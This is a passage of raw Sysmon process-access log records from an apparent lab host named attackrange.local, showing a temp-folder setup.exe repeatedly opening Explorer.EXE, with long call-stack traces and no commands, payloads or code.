8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
